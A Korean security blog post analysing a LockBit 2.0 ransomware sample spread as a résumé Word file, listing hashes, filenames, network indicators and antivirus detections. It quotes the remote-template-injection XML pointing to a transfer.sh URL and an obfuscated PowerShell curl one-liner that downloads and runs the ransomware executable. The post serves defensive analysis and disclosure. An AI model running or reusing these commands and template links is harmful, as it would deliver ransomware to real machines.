꿈을꾸는 파랑새

오늘은 이력서 로 위장해서 유포 중인 LockBit 랜섬웨어 2.0인 김기환.docx에 대해 글을 적어 보겠습니다.
해당 악성코드는 지난 시간에 적은 이태원 참사 악성코드 등과 같이 원격 템플릿 주입(Remote Template Injection) 기술을 사용을 하고 있으며 간단하게 이야기하면 순간 외부 URL에 호스팅 된 진짜 콘텐츠를 가져옴으로써 변경될 수 있다는 특징을 가지고 있으며 공격자는 해당 URL 주소를 변경시켜 악성코드를 통해서 악성행위를 진행을 하면 아마도 기업을 대상으로 공격하는 것 같습니다.
먼저 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:김기환.docx
사이즈:155 KB
CRC32:1a9baf51
MD5:4b6a088568f7293969566b7bdaf58741
SHA-1:5723299076c4a032cda695ce74ef6e54f9ab2f52
SHA-256:87e2e3291268aa3e203cfe917ee7974926bcab7d3b0f417b7b2ede4acfd2869f
SHA-512:edd7f48a7d59e7ea5eb0512b4bc39a1a2269d9866c656c1b41d1479023edc4cef15f914f290146ae3ed2e765bb207a45e906c6d3ae65dc96b1ae240faad5b919

LockBit 랜섬웨어 2.0 워드 실행LockBit 랜섬웨어 2.0 실행 2
LockBit 랜섬웨어 2.0 워드 실행

그리고 다음과 같은 이름으로도 유포를 하고 있습니다.
=?UTF-8?B?6rmA(6)riw7ZmYLmRvY3g=?=
김기환(.)docx
87e2e3291268aa3e203cfe917ee7974926bcab7d3b0f417b7b2ede4acfd2869f(.)docx
4b6a088568f7293969566b7bdaf58741(.)docx
f7a2fc4e471a203c8a5683c02ada2c3931c8f0ec(.)bin
fdrsetrgh(.)exe
fdrsetrgh(.)exe(.)bin
fdjk483u9rey89t53e(.)exe(.)vir

Cerbero Suite Advanced 본 악성코드 다운로드 위치
Cerbero Suite Advanced 본 악성코드 다운로드 위치

$이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)exe
123(.)exe
_이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)exe
FE5101B50E92A923D74CC6F0F4225539(.)exe
^이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)bin
#이력서_221122(경력사항도 같이 기재하였습니다 잘 부탁드립니다)(.)exe
fe5101b50e92a923d74cc6f0f4225539(.)bin
그리고 악성코드는 다음과 경로에 악성코드를 실행하기 위한 원격 템플릿 주입(Remote Template Injection)이 포함이 돼 있는 것을 확인할 수가 있습니다.
C:\Users\???\Downloads\김기환\word\_rels에 있는 settings.xml.rels 를 열어보면 다음과 같이 악성코드를 실행하기 위한 원격 템플릿 주입(Remote Template Injection)가 포함이 돼 있는 것을 확인할 수가 있습니다.

settings.xml 에 포함이 되어져 있는 악성코드 주소
settings.xml 에 포함이 되어져 있는 악성코드 주소

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate" 
Target="https://transfer(.)sh/get/KgHDsr/s3g53o.dotm" TargetMode="External"/></Relationships>

해당 악성코드를 실행하면 s3g53o(.)dotm 이라는 파일을 다운로드 하게 돼 있습니다.
일단 개인적으로 2022.12.07 에서는 해당 악성코드가 샘플은 다운로드 되지 않았지만, 동작은 다음과 같이 합니다.

cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer(.)sh/get/JQJU3c/fdrsetrgh.e(^)xe -o C:\Users\Public\fdjk483u9rey89t53e(.)exe;
C:\Users\Public\fdjk483u9rey89t53e(.)exe
-> powershell /W 01 curl https://transfer(.)sh/get/JQJU3c/fdrsetrgh.exe -o 
C:\Users\Public\fdjk483u9rey89t53e(.)exe;C:\Users\Public\fdjk483u9rey89t53e(.)exe

LockBit 랜섬웨어 2.0 랜섬노트
LockBit 랜섬웨어 2.0 랜섬노트

로 해서 랜섬웨어는 자동으로 설치되면 해당 악성코드가 실행되면 접속을 시도하는 사이트는 다음과 같습니다.

http://x1.c.lencr(.)org/
http://r3.o.lencr(.)org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuu(U)AlA5h%2BvnYsUwsYCEgPmmBJ%2FIwlx%2BBpaP471WFQOxA%3D%3D
transfer(.)sh

IP 트래픽은 다음과 같이 됩니다.
144.76.136(.)153:443(TCP)
209.197.3(.)8:80(TCP)
224.0.0(.)252:5355(UDP)
239.255.255(.)250:1900(UDP)
255.255.255(.)255:67(UDP)
52.109.4(.)32:443(TCP)
그리고 해당 랜섬웨어 다음과 같은 동작을 합니다.
호스트 파일을 읽기
실행 중인 모든 프로세스 목록 조회
장치의 볼륨 정보(이름, 일련번호 등)조회
파일 및 디렉터리 검색
ini 파일 쓰기
가상화, 샌드박스 회피
동적 분석을 방해하는 휴면(회피 루프) 가능

V3 LockBit 랜섬웨어 2.0 랜섬웨어 탐지
V3 LockBit 랜섬웨어 2.0 랜섬웨어 탐지

2022-12-07 07:51:25 UTC VirusTotal(바이러스토탈)에서 탐지하는 보안업체들은 다음과 같습니다.
Acronis (Static ML):Suspicious
Ad-Aware:Trojan.GenericKD.63830642
AhnLab-V3:Ransomware/Win.LockBit.C5312148
Alibaba:TrojanDropper:Win32/Injector.c937e31c
ALYac:Trojan.Ransom.LockBit
Arcabit:Trojan.Generic.D3CDFA72
Avast:NSIS:RansomX-gen [Ransom]
AVG:NSIS:RansomX-gen [Ransom]
Avira (no cloud):HEUR/AGEN.1252584
BitDefender:Trojan.GenericKD.63830642
Bkav Pro:W32.AIDetect.malware2
Comodo:Malware@#8d3ibwx0b4wb
Cylance:Unsafe
Cynet:Malicious (score: 99)
Cyren:W32/ABRisk.ZZAV-3488
DrWeb:Trojan.Encoder.34248
Elastic:Malicious (high Confidence)
Emsisoft:Trojan.GenericKD.63830642 (B)
eScan:Trojan.GenericKD.63830642
ESET-NOD32:A Variant Of Generik.CGYMBJZ
F-Secure:Heuristic.HEUR/AGEN.1252584
Fortinet:NSIS/Injector.AOW!tr
GData:Trojan.GenericKD.63830642
Google:Detected
Gridinsoft (no cloud):Ransom.Win32.Sabsik.sa
Ikarus:Trojan.NSIS.Injector
K7AntiVirus:Trojan ( 0059bbf41 )
K7GW:Trojan ( 0059bbf41 )
Kaspersky:HEUR:Trojan-Dropper.Win32.Agent.gen
Kingsoft:Win32.Troj.Undef.(kcloud)
Lionic:Trojan.Win32.Agent.Y!c
Malwarebytes:Ransom.LockBit
MAX:Malware (ai Score=100)
McAfee:Artemis!FE5101B50E92
McAfee-GW-Edition:BehavesLike.Win32.Generic.th
Microsoft:Trojan:Win32/Casdet!rfn
Panda:Trj/Chgt.AD
Rising:Trojan.Injector/NSIS!1.BFBB (CLASSIC)
Sangfor Engine Zero:Dropper.Win32.Agent.V7l9
SecureAge:Malicious
Sophos:Mal/Generic-S
Symantec:Downloader
Tencent:Win32.Trojan-Dropper.Agent.Vmhl
Trellix (FireEye):Generic.mg.fe5101b50e92a923
TrendMicro:Ransom.Win32.LOCKBIT.YXCKXZ
TrendMicro-HouseCall:Ransom.Win32.LOCKBIT.YXCKXZ
VBA32:TrojanRansom.LockBit
VIPRE:Trojan.GenericKD.63830642
VirIT:Trojan.Win32.NSISDrp.BUF
ViRobot:Trojan.Win32.Z.Injector.1593708
Webroot:W32.Ransom.Lockbit
Zillya:Dropper.Agent.Win32.518061
ZoneAlarm by Check Point:HEUR:Trojan-Dropper.Win32.Agent.gen

[소프트웨어 팁/보안 및 분석] - 랜섬웨어부터 컴퓨터를 보호해주는 랜섬웨어 보호 도구-앱체크(App Check)

 

랜섬웨어부터 컴퓨터를 보호해주는 랜섬웨어 보호 도구-앱체크(App Check)

앱체크(APP Check)이라는 프로그램은 한국의 보안 업체 중 하나인 CheckMAL에서 제작을 하여서 제공하는 랜섬웨어 보호 도구입니다. 일단 개인이 사용하는 비영리 버전과 기업에서 사용하는 프로 버

wezard4u.tistory.com

이며 항상 백신 프로그램을 설치 실시간 업데이트 및 실시간 감시 그리고 사전 방역 시스템 등을 켜두고 컴퓨터를 사용하는 것이 좋으면 항상 기본적인 보안 수칙을 지키는 것이 안전하게 컴퓨터를 사용하는 방법

그리고 랜섬웨어 전용 방지 프로그램인 앱 체크를 사용한다고 하면 V3, 알약에서 기본적으로 있는 랜섬웨어 방지 기능은 비활성화시키고 사용을 하시면 될 것입니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band